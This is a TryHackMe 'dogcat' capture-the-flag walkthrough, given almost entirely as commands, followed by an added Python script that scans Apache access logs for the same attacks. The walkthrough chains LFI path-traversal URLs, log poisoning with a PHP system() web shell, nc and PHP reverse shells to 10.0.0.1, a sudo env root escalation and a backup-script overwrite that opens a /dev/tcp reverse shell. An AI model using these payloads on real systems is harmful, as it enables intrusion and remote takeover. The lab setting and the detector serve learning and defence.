TryHackMe: dogcat

nmap -Pn <ip>
nmap -A -p 22,80 <ip>
nmap --script vuln -p 22,80 <ip>
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html
http://<ip>/?view=./dog/../../../../../../../../../../../../../etc/passwd
http://<ip>/?view=php://filter/convert.base64-encode/resource=./dog../../index
http://<ip>/?view=./dog../../../../../../../../etc/passwd&ext=
http://<ip>/?view=./dog../../../../../../../../var/log/apache2/access.log&ext=
 <?php system($_GET['cmd']); ?>
/?view=./dog../../../../../../../../var/log/apache2/access.log&ext=id
nc -lvp 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
pwd
ls
cat flag.php
cd ..
ls
cat flag2_QMW7JvaY2LvK.txt
cd /home
ls
ls -la
sudo env /bin/sh
id
cd /root
ls
cat flag3.txt
cd /tmp
ls
cd /opt
ls -la
cd backups
ls -la
cat backup.sh
nc -lvp 1235
echo "#!/bin/bash" > backup.sh
echo "/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1235 0>&1'" >> backup.sh
ls
cat flag4.txt
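
A defender's view of the view= requests above, as an added example that is not part of the original write-up: a Python scan of Apache combined-format access-log lines that flags traversal in the view parameter, stream wrappers such as php://filter, includes of the log file itself, and a PHP open tag written into the log. The sample lines are constructed, and the request field that carries the PHP payload in them is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache "combined" format: host ident user [time] "request" status size "referer" "agent"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "(.*)"$')

# Constructed sample lines (not taken from the room); URLs follow the ones in the write-up.
SAMPLE = """\
10.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /?view=dog HTTP/1.1" 200 455 "-" "Mozilla/5.0"
10.0.0.1 - - [01/Jan/2024:10:00:02 +0000] "GET /?view=php://filter/convert.base64-encode/resource=./dog../../index HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.0.0.1 - - [01/Jan/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 418 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.1 - - [01/Jan/2024:10:00:04 +0000] "GET /?view=./dog../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1" 200 900 "-" "Mozilla/5.0"
""".splitlines()

def classify(line):
    """Return the sorted list of findings for one access-log line."""
    m = LINE.match(line)
    if not m:
        return ["unparsed"]
    _host, request, _status, referer, agent = m.groups()
    findings = set()
    # A PHP open tag in any client-controlled field means the log now holds code
    # that a later include of the log file would execute.
    if any("<?" in unquote(field) for field in (request, referer, agent)):
        findings.add("php-tag-in-log")
    parts = request.split(" ")
    target = parts[1] if len(parts) >= 2 else ""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in query.get("view", []):  # parse_qs already percent-decodes
        if "../" in value or "..\\" in value:
            findings.add("traversal")
        if re.match(r"(?i)[a-z][a-z0-9+.-]*://", value):
            findings.add("stream-wrapper")
        if re.search(r"(?i)/var/log/|access\.log", value):
            findings.add("log-include")
    return sorted(findings)

def scan(lines):
    """Map 1-based line number -> findings, skipping clean lines."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}

if __name__ == "__main__":
    for number, findings in scan(SAMPLE).items():
        print(number, ", ".join(findings))
```

A php-tag-in-log hit followed by a log-include hit from the same client is the sequence to alert on; either one alone is already worth a look.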

ratiros01